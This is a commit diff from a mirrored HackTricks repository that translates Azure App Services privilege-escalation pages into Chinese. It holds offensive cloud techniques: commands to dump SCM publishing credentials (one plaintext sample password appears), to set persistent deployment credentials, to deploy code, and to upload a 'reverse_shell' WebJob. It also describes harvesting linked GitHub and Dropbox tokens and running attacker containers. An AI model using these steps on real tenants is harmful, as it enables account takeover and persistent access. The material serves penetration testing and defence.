gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-12 15:50:19 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation

Browse Source
This commit is contained in:
Translator
2025-05-09 11:19:10 +00:00
parent 4b0e2d4593
commit 6366d83100
7 changed files with 423 additions and 789 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@@ -425,6 +425,7 @@
- [Az - Key Vault](pentesting-cloud/azure-security/az-services/az-keyvault.md)
- [Az - Logic Apps](pentesting-cloud/azure-security/az-services/az-logic-apps.md)
- [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md)
- [Az - Misc](pentesting-cloud/azure-security/az-services/az-misc.md)
- [Az - Monitoring](pentesting-cloud/azure-security/az-services/az-monitoring.md)
- [Az - MySQL](pentesting-cloud/azure-security/az-services/az-mysql.md)
- [Az - PostgreSQL](pentesting-cloud/azure-security/az-services/az-postgresql.md)

BIN
src/images/lasttower.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 68 KiB

324
src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
View File

@@ -4,7 +4,7 @@
## App Services
For more information about Azure App services check:
有关 Azure App 服务的更多信息,请查看:
{{#ref}}
../az-services/az-app-services.md
@@ -12,17 +12,14 @@ For more information about Azure App services check:
### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read
These permissions allow to get a **SSH shell** inside a web app. They also allow to **debug** the application.
- **SSH in single command**:
这些权限允许在 web 应用程序内部获取 **SSH shell**。它们还允许 **调试** 应用程序。
- **单命令 SSH**
```bash
# Direct option
az webapp ssh --name <name> --resource-group <res-group>
```
- **Create tunnel and then connect to SSH**:
- **创建隧道然后连接到SSH**:
```bash
az webapp create-remote-connection --name <name> --resource-group <res-group>
@@ -35,152 +32,146 @@ az webapp create-remote-connection --name <name> --resource-group <res-group>
## So from that machine ssh into that port (you might need generate a new ssh session to the jump host)
ssh root@127.0.0.1 -p 39895
```
- **调试应用程序**
1. 在 VScode 中安装 Azure 扩展。
2. 使用 Azure 账户登录扩展。
3. 列出订阅中的所有应用服务。
4. 选择要调试的应用服务,右键单击并选择“开始调试”。
5. 如果应用未启用调试,扩展将尝试启用它,但您的账户需要权限 `Microsoft.Web/sites/config/write` 才能执行此操作。
- **Debug the application**:
1. Install the Azure extension in VScode.
2. Login in the extension with the Azure account.
3. List all the App services inside the subscription.
4. Select the App service you want to debug, right click and select "Start Debugging".
5. If the app doesn't have debugging enabled, the extension will try to enable it but your account needs the permission `Microsoft.Web/sites/config/write` to do so.
### 获取 SCM 凭据和启用基本身份验证
### Obtaining SCM Credentials & Enabling Basic Authentication
To obtain the SCM credentials, you can use the following **commands and permissions**:
- The permission **`Microsoft.Web/sites/publishxml/action`** allows to call:
要获取 SCM 凭据,您可以使用以下 **命令和权限**
- 权限 **`Microsoft.Web/sites/publishxml/action`** 允许调用:
```bash
az webapp deployment list-publishing-profiles --name <app-name> --resource-group <res-group>
# Example output
[
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"hostingProviderForumLink": "",
"msdeploySite": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Web Deploy",
"publishMethod": "MSDeploy",
"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
},
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"ftpPassiveMode": "True",
"hostingProviderForumLink": "",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - FTP",
"publishMethod": "FTP",
"publishUrl": "ftps://waws-prod-yt1-067.ftp.azurewebsites.windows.net/site/wwwroot",
"userName": "happy-bay-0d8f842ef57843c89185d452c1cede2a\\$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
},
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"hostingProviderForumLink": "",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Zip Deploy",
"publishMethod": "ZipDeploy",
"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
}
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"hostingProviderForumLink": "",
"msdeploySite": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Web Deploy",
"publishMethod": "MSDeploy",
"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
},
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"ftpPassiveMode": "True",
"hostingProviderForumLink": "",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - FTP",
"publishMethod": "FTP",
"publishUrl": "ftps://waws-prod-yt1-067.ftp.azurewebsites.windows.net/site/wwwroot",
"userName": "happy-bay-0d8f842ef57843c89185d452c1cede2a\\$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
},
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"hostingProviderForumLink": "",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Zip Deploy",
"publishMethod": "ZipDeploy",
"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
}
]
```
注意 **用户名始终相同**(除了 FTP它在开头添加了应用的名称**密码对它们来说是相同的**
Note how the **username is always the same** (except in FTP which ads the name of the app at the beginning) but the **password is the same** for all of them.
Moreover, the **SCM URL is `<app-name>.scm.azurewebsites.net`**.
- The permission **`Microsoft.Web/sites/config/list/action`** allows to call:
此外,**SCM URL 是 `<app-name>.scm.azurewebsites.net`**。
- 权限 **`Microsoft.Web/sites/config/list/action`** 允许调用:
```bash
az webapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>
# Example output
{
"id": "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/carlos_rg_3170/providers/Microsoft.Web/sites/happy-bay-0d8f842ef57843c89185d452c1cede2a/publishingcredentials/$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"kind": null,
"location": "Canada Central",
"name": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
"publishingPassword": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"publishingPasswordHash": null,
"publishingPasswordHashSalt": null,
"publishingUserName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"resourceGroup": "carlos_rg_3170",
"scmUri": "https://$happy-bay-0d8f842ef57843c89185d452c1cede2a:bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS@happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net",
"type": "Microsoft.Web/sites/publishingcredentials"
"id": "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/carlos_rg_3170/providers/Microsoft.Web/sites/happy-bay-0d8f842ef57843c89185d452c1cede2a/publishingcredentials/$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"kind": null,
"location": "Canada Central",
"name": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
"publishingPassword": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"publishingPasswordHash": null,
"publishingPasswordHashSalt": null,
"publishingUserName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"resourceGroup": "carlos_rg_3170",
"scmUri": "https://$happy-bay-0d8f842ef57843c89185d452c1cede2a:bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS@happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net",
"type": "Microsoft.Web/sites/publishingcredentials"
}
```
注意**凭据与之前的命令相同**。
Note how the **credentials are the same** as in the previous command.
- Another option would be to **set you own creds** and use them:
- 另一个选项是**设置您自己的凭据**并使用它们:
```bash
# Show if any user is configured (password won't be shown)
az webapp deployment user show
# Set your own credentials
az webapp deployment user set \
--user-name hacktricks \
--password 'W34kP@ssw0rd123!'
--user-name hacktricks \
--password 'W34kP@ssw0rd123!'
# To delete it, check https://stackoverflow.com/questions/45275329/remove-deployment-credentials-from-azure-webapp
```
然后,您可以使用这些凭据来**访问SCM和FTP平台**。这也是保持持久性的好方法。
Then, you can use this credentials to **access the SCM and FTP platforms**. This is also a great way to maintain persistence.
Remember that to access the SCM platform from the **web you need to access to `<SCM-URL>/BasicAuth`**.
请记住,要从**网页访问SCM平台您需要访问`<SCM-URL>/BasicAuth`**。
> [!WARNING]
> Note that every user can configure it's own credentials calling the previous command, but if the user doesn't have enough permissions to access the SCM or FTP, the credentials won't work.
- If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write`):
> 请注意每个用户都可以通过调用之前的命令来配置自己的凭据但如果用户没有足够的权限访问SCM或FTP则凭据将无效。
- 如果您看到这些凭据是**已编辑的**,那是因为您**需要启用SCM基本身份验证选项**,为此您需要第二个权限(`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write`
```bash
# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'
# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'
```
### 使用SCM凭据发布代码
### Publish code using SCM credentials
仅凭有效的SCM凭据就可以**发布代码**到应用服务。这可以通过以下命令完成。
Just having valid SCM credentials it's possible to **publish code** to the App service. This can be done using the following command.
For this python example you can download the repo from https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart, do any **changes** you wish and then **zip it running: `zip -r app.zip .`**.
Then you can **publish the code** in a web app with the following command:
对于这个Python示例您可以从https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart下载仓库进行您想要的任何**更改**,然后**运行:`zip -r app.zip .`进行压缩**。
然后,您可以使用以下命令**发布代码**到Web应用
```bash
curl -X POST "<SMC-URL>/api/publish?type=zip" --data-binary "@./app.zip" -u '<username>:<password>' -H "Content-Type: application/octet-stream"
```
### Webjobs: Microsoft.Web/sites/publish/Action | SCM credentials
The mentioned Azure permission allows to perform several interesting actions that can also be performed with the SCM credentials:
- Read **Webjobs** logs:
提到的 Azure 权限允许执行几个有趣的操作,这些操作也可以使用 SCM 凭据执行:
- 阅读 **Webjobs** 日志:
```bash
# Using Azure credentials
az rest --method GET --url "<SCM-URL>/vfs/data/jobs/<continuous | triggered>/rev5/job_log.txt" --resource "https://management.azure.com/"
@@ -188,123 +179,108 @@ az rest --method GET --url "https://lol-b5fyaeceh4e9dce0.scm.canadacentral-01.az
# Using SCM username and password:
curl "<SCM-URL>/vfs/data/jobs/continuous/job_name/job_log.txt" \
--user '<username>:<password>' -v
--user '<username>:<password>' -v
```
- Read **Webjobs** source code:
- 阅读 **Webjobs** 源代码:
```bash
# Using SCM username and password:
# Find all the webjobs inside:
curl "<SCM-URL>/wwwroot/App_Data/jobs/" \
--user '<username>:<password>'
--user '<username>:<password>'
# e.g.
curl "https://nodewebapp-agamcvhgg3gkd3hs.scm.canadacentral-01.azurewebsites.net/wwwroot/App_Data/jobs/continuous/job_name/rev.js" \
--user '<username>:<password>'
--user '<username>:<password>'
```
- Create **continuous Webjob**:
- 创建 **连续 Webjob**
```bash
# Using Azure permissions
az rest \
--method put \
--uri "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/api/Continuouswebjobs/reverse_shell" \
--headers '{"Content-Disposition": "attachment; filename=\"rev.js\""}' \
--body "@/Users/username/Downloads/rev.js" \
--resource "https://management.azure.com/"
--method put \
--uri "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/api/Continuouswebjobs/reverse_shell" \
--headers '{"Content-Disposition": "attachment; filename=\"rev.js\""}' \
--body "@/Users/username/Downloads/rev.js" \
--resource "https://management.azure.com/"
# Using SCM credentials
curl -X PUT \
"<SCM-URL>/api/Continuouswebjobs/reverse_shell2" \
-H 'Content-Disposition: attachment; filename=rev.js' \
--data-binary "@/Users/carlospolop/Downloads/rev.js" \
--user '<username>:<password>'
"<SCM-URL>/api/Continuouswebjobs/reverse_shell2" \
-H 'Content-Disposition: attachment; filename=rev.js' \
--data-binary "@/Users/carlospolop/Downloads/rev.js" \
--user '<username>:<password>'
```
### Microsoft.Web/sites/write, Microsoft.Web/sites/read, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
These permissions allow to **assign a managed identity** to the App service, so if an App service was previously compromised this will allow the attacker to assign new managed identities to the App service and **escalate privileges** to them.
这些权限允许**将托管身份分配**给应用服务,因此如果应用服务之前被攻陷,这将允许攻击者将新的托管身份分配给应用服务并**提升权限**。
```bash
az webapp identity assign --name <app-name> --resource-group <res-group> --identities /subscriptions/<subcripttion-id>/resourceGroups/<res_group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>
```
### Microsoft.Web/sites/config/list/action
This permission allows to list the **connection strings** and the **appsettings** of the App service which might contain sensitive information like database credentials.
此权限允许列出 App 服务的 **connection strings** **appsettings**,这些可能包含敏感信息,如数据库凭据。
```bash
az webapp config connection-string list --name <name> --resource-group <res-group>
az webapp config appsettings list --name <name> --resource-group <res-group>
```
### 读取配置的第三方凭据
### Read Configured Third Party Credentials
Running the following command it's possible to **read the third party credentials** configured in the current account. Note that if for example some Github credentials are configured in a different user, you won't be able to access the token from a different one.
运行以下命令可以**读取当前账户中配置的第三方凭据**。请注意如果例如某些Github凭据配置在不同的用户中您将无法从其他用户访问该令牌。
```bash
az rest --method GET \
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
```
此命令返回 Github、Bitbucket、Dropbox 和 OneDrive 的令牌。
This command returns tokens for Github, Bitbucket, Dropbox and OneDrive.
Here you have some command examples to check the tokens:
以下是一些检查令牌的命令示例:
```bash
# GitHub List Repositories
curl -H "Authorization: token <token>" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/repos
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/repos
# Bitbucket List Repositories
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://api.bitbucket.org/2.0/repositories
-H "Accept: application/json" \
https://api.bitbucket.org/2.0/repositories
# Dropbox List Files in Root Folder
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
--data '{"path": ""}'
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
--data '{"path": ""}'
# OneDrive List Files in Root Folder
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://graph.microsoft.com/v1.0/me/drive/root/children
-H "Accept: application/json" \
https://graph.microsoft.com/v1.0/me/drive/root/children
```
### 从源更新应用代码
### Update App Code from the source
- If the configured source is a third-party provider like Github, BitBucket or an Azure Repository, you can **update the code** of the App service by compromising the source code in the repository.
- If the app is configured using a **remote git repository** (with username and password), it's possible to get the **URL and basic auth credentials** to clone and push changes with:
- Using the permission **`Microsoft.Web/sites/sourcecontrols/read`**: `az webapp deployment source show --name <app-name> --resource-group <res-group>`
- Using the permission **`Microsoft.Web/sites/config/list/action`**:
- `az webapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>`
- `az rest --method POST --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"`
- If the app is configured to use a **local git repository**, it's possible to **clone the repository** and **push changes** to it:
- Using the permission **`Microsoft.Web/sites/sourcecontrols/read`**: You can get the URL of the git repo with `az webapp deployment source show --name <app-name> --resource-group <res-group>`, but it's going to be the same as the the SCM URL of the app with the path `/<app-name>.git` (e.g. `https://pythonwebapp-audeh9f5fzeyhhed.scm.canadacentral-01.azurewebsites.net:443/pythonwebapp.git`).
- To get the SCM credential you need the permission:
- **`Microsoft.Web/sites/publishxml/action`**: Then run `az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>`.
- **`Microsoft.Web/sites/config/list/action`**: Then run `az webapp deployment list-publishing-credentials --name <name> --resource-group <res-group>`
- 如果配置的源是第三方提供商,如 Github、BitBucket 或 Azure Repository您可以通过破坏存储库中的源代码来**更新应用**的代码。
- 如果应用使用**远程 git 存储库**(带有用户名和密码)进行配置,可以通过以下方式获取**URL 和基本身份验证凭据**以克隆和推送更改:
- 使用权限 **`Microsoft.Web/sites/sourcecontrols/read`**: `az webapp deployment source show --name <app-name> --resource-group <res-group>`
- 使用权限 **`Microsoft.Web/sites/config/list/action`**:
- `az webapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>`
- `az rest --method POST --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"`
- 如果应用配置为使用**本地 git 存储库**,可以**克隆存储库**并**推送更改**
- 使用权限 **`Microsoft.Web/sites/sourcecontrols/read`**: 您可以通过 `az webapp deployment source show --name <app-name> --resource-group <res-group>` 获取 git 存储库的 URL但它将与应用的 SCM URL 相同,路径为 `/<app-name>.git`(例如 `https://pythonwebapp-audeh9f5fzeyhhed.scm.canadacentral-01.azurewebsites.net:443/pythonwebapp.git`)。
- 要获取 SCM 凭据,您需要权限:
- **`Microsoft.Web/sites/publishxml/action`**: 然后运行 `az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>`
- **`Microsoft.Web/sites/config/list/action`**: 然后运行 `az webapp deployment list-publishing-credentials --name <name> --resource-group <res-group>`
> [!WARNING]
> Note that having the permission `Microsoft.Web/sites/config/list/action` and the SCM credentials it's always possible to deploy into a webapp (even if it was configured to use a third-party provider) as mentioned in a previous section.
> 请注意,拥有权限 `Microsoft.Web/sites/config/list/action` 和 SCM 凭据始终可以部署到 webapp即使它被配置为使用第三方提供商如前面部分所述。
> [!WARNING]
> Note that having the permissions below it's also **possible to execute an arbitrary container** even if the webapp was configured differently.
> 请注意,拥有以下权限也**可以执行任意容器**,即使 webapp 的配置不同。
### `Microsoft.Web/sites/config/Write`, `Microsoft.Web/sites/config/Read`, `Microsoft.Web/sites/config/list/Action`, `Microsoft.Web/sites/Read`
This is the set of permissions that allows to **modify the container used** by a webapp. An attacker could abuse it to make a webapp execute a malicious container.
这是允许**修改 webapp 使用的容器**的一组权限。攻击者可以利用它使 webapp 执行恶意容器。
```bash
az webapp config container set \
--name <app-name> \
--resource-group <res-group> \
--docker-custom-image-name mcr.microsoft.com/appsvc/staticsite:latest
--name <app-name> \
--resource-group <res-group> \
--docker-custom-image-name mcr.microsoft.com/appsvc/staticsite:latest
```
{{#include ../../../banners/hacktricks-training.md}}

71
src/pentesting-cloud/azure-security/az-services/az-app-services.md
View File

@@ -6,53 +6,54 @@
Azure App Services 使开发人员能够 **无缝构建、部署和扩展 Web 应用程序、移动应用后端和 API**。它支持多种编程语言,并与各种 Azure 工具和服务集成,以增强功能和管理。
每个应用程序都在沙箱运行,但隔离程度取决于 App Service 计划:
每个应用程序都在沙箱运行,但隔离取决于 App Service 计划:
- 免费和共享层的应用程序运行在 **共享虚拟机**
- 标准和高级层的应用程序运行在 **仅由同一 App Service 计划中的应用程序共享的专用虚拟机** 上。
- 隔离层运行在 **专用虚拟机上,位于专用虚拟网络中**,提高了应用程序的隔离性。
> [!WARNING]
> 请注意,**没有**这些隔离 **防止** 其他常见的 **Web 漏洞**(例如文件上传或注入)。如果使用 **管理身份**,则可能能够 **提升权限**。
> 请注意,这些隔离 **并不能防止** 其他常见的 **Web 漏洞**(例如文件上传或注入)。如果使用 **管理身份**,则可能能够 **提升权限**。
应用程序有一些有趣的配置:
- **始终开启**:确保应用程序始终运行。如果未启用,应用程序将在 20 分钟不活动后停止运行,并在收到请求时重新启动。
- 如果您有需要持续运行的 Web 作业这是必需的因为如果应用程序停止Web 作业也会停止。
- 如果您有需要持续运行的 WebJob这是必需的因为如果应用程序停止WebJob 也会停止。
- **SSH**:如果启用,具有足够权限的用户可以使用 SSH 连接到应用程序。
- **调试**:如果启用,具有足够权限的用户可以调试应用程序。但是,这会在每 48 小时自动禁用。
- **调试**:如果启用,具有足够权限的用户可以调试应用程序。然而,这会在每 48 小时自动禁用。
- **Web 应用 + 数据库**Web 控制台允许创建带有数据库的应用程序。在这种情况下可以选择要使用的数据库SQLAzure、PostgreSQL、MySQL、MongoDB并且还允许您创建 Azure Cache for Redis。
- 包含数据库和 Redis 凭据的 URL 将存储在 **appsettings** 中。
- **容器**:可以通过指示容器的 URL 和访问凭据将容器部署到 App Service。
- **挂载**:可以从存储帐户创建 5 个挂载,这些存储帐户可以是 Azure Blob只读或 Azure Files。配置将存储访问密钥在存储帐户上
- **挂载**:可以从存储帐户创建 5 个挂载,这些存储帐户可以是 Azure Blob只读或 Azure Files。配置将存储访问密钥。
- **网络**:可以公开可用或仅通过 VNet 的私有端点访问。
## Basic Authentication
在创建 Web 应用程序(通常是 Azure 函数)时,可以指示是否要 **启用基本身份验证**(默认情况下禁用)。这基本上 **启用 SCM控制管理)和 FTP文件传输协议**,因此可以使用这些技术部署应用程序。
在创建 Web 应用程序(通常是 Azure 函数)时,可以指示是否要 **启用基本身份验证**(默认情况下禁用)。这基本上 **启用 SCM代码管理)和 FTP文件传输协议**,因此可以使用这些技术部署应用程序。
要访问 SCM 和 FTP 服务器,需要 **用户名和密码**。因此Azure 提供了一些 **API 来获取这些平台的 URL** 和凭据。
**FTP 服务器没有任何特殊的魔法**,只需有效的 URL、用户名和密码即可连接并获得对应用环境的读写权限。
SCM
可以使用 Web 浏览器连接到 SCM地址为 `https://<SMC-URL>/BasicAuth`,并检查其中的所有文件和部署。
可以通过在 `https://<SMC-URL>/BasicAuth` 中使用 Web 浏览器连接到 SCM,并检查其中的所有文件和部署。
### Kudu
Kudu 是 **管理 SCM 和 Web 及 API 接口** 的平台,用于管理 App Service并提供基于 Git 的部署、远程调试和文件管理功能。可以通过在 Web 应用程序中定义的 SCM URL 访问
Kudu 是 **管理 SCM 和 Web 及 API 接口** 的平台,用于管理 App Service并提供基于 Git 的部署、远程调试和文件管理功能。可以通过在 Web 应用中定义的 SCM URL 访问。
请注意App Services 和 Function Apps 使用的 Kudu 版本不同Function Apps 的版本要有限得多。
您可以在 Kudu 中找到一些有趣的端点:
您可以在 Kudu 中找到一些有趣的端点包括
- `/BasicAuth`:您需要访问此路径以 **登录 Kudu**
- `/DebugConsole`:一个控制台,允许您在 Kudu 运行的环境中执行命令。
- 请注意,此环境 **无法访问** 元数据服务以获取令牌。
- `/webssh/host`:一个基于 Web 的 SSH 客户端,允许您连接到应用程序运行的容器内。
- 此环境 **可以访问** 元数据服务,以便从分配的管理身份中获取令牌。
- 此环境 **可以访问元数据服务** 以获取分配的管理身份令牌。
- `/Env`:获取有关系统、应用设置、环境变量、连接字符串和 HTTP 头的信息。
- `/wwwroot/`Web 应用程序的根目录。您可以从这里下载所有文件。
- `/wwwroot/`Web 应用的根目录。您可以从这里下载所有文件。
此外Kudu 曾经是开源的,地址为 [https://github.com/projectkudu/kudu](https://github.com/projectkudu/kudu),但该项目已被弃用,比较当前 Azure 中的 Kudu 与旧版 Kudu 的行为,可以看到 **许多事情已经改变**
此外Kudu 曾 [https://github.com/projectkudu/kudu](https://github.com/projectkudu/kudu) 上开源,但该项目已被弃用, Azure 中当前的 Kudu 行为相比,可以看到 **许多事情已经改变**
## Sources
@@ -65,31 +66,31 @@ App Services 默认允许将代码作为 zip 文件上传,但也允许连接
- 您可以通过运行 `az webapp deployment source show --name <app-name> --resource-group <res-group>``az rest --method POST --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"` 获取远程仓库的凭据。
- 还可以使用 **Azure Repository**
- 还可以配置 **本地 git 仓库**
- 您可以通过 `az webapp deployment source show --name <app-name> --resource-group <res-group>` 获取 git 仓库的 URL这将是应用程序的 SCM URL。
- 要克隆它,您需要 SCM 凭据,可以通过 `az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>` 获取。
- 您可以通过 `az webapp deployment source show --name <app-name> --resource-group <res-group>` 获取 git 仓库的 URL这将是应用的 SCM URL。
- 要克隆它,您需要 SCM 凭据,可以通过 `az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>` 获取。
## Webjobs
Azure WebJobs 是 **在 Azure App Service 环境中运行的后台任务**。它们允许开发人员在 Web 应用程序旁边执行脚本或程序,使处理异步或耗时操作(如文件处理、数据处理或计划任务)变得更加容易。
Web 作业有 2 种类型:
- **持续**:无限期循环运行,并在创建后立即触发。它非常适合需要持续处理的任务。但是,如果应用程序因未启用始终开启而停止运行,并且在过去 20 分钟内收到请求,Web 作业也会停止。
- **触发**:按需或基于计划运行。最适合定期任务,例如批量数据更新或维护例程。
Azure WebJobs 是 **在 Azure App Service 环境中运行的后台任务**。它们允许开发人员在 Web 应用程序旁边执行脚本或程序,使处理异步或耗时操作(如文件处理、数据处理或计划任务)变得更加容易。
WebJobs 有 2 种类型:
- **持续**:无限期循环运行,并在创建后立即触发。它非常适合需要持续处理的任务。然而,如果应用程序因未启用始终开启而停止运行,并且在过去 20 分钟内没有收到请求WebJob 也会停止。
- **触发**:按需运行或基于计划运行。最适合定期任务,例如批量数据更新或维护例程。
从攻击者的角度来看Web 作业非常有趣,因为它们可以用来 **在环境中执行代码****提升权限** 到附加的管理身份。
从攻击者的角度来看WebJobs 非常有趣,因为它们可以用来 **在环境中执行代码****提升权限** 到附加的管理身份。
此外,检查 Web 作业生成的 **日志** 也总是很有趣,因为它们可能包含 **敏感信息**
此外,检查 WebJobs 生成的 **日志** 也总是很有趣,因为它们可能包含 **敏感信息**
## Slots
Azure App Service Slots 用于 **将应用程序的不同版本部署到同一 App Service**。这允许开发人员在将新功能或更改部署到生产环境之前,在单独的环境中进行测试。
Azure App Service Slots 用于 **将应用程序的不同版本部署到同一 App Service**。这使开发人员能够在将新功能或更改部署到生产环境之前,在单独的环境中进行测试。
此外,可以将 **一定比例的流量** 路由到特定的插槽,这对于 A/B 测试和 **后门目的** 很有用。
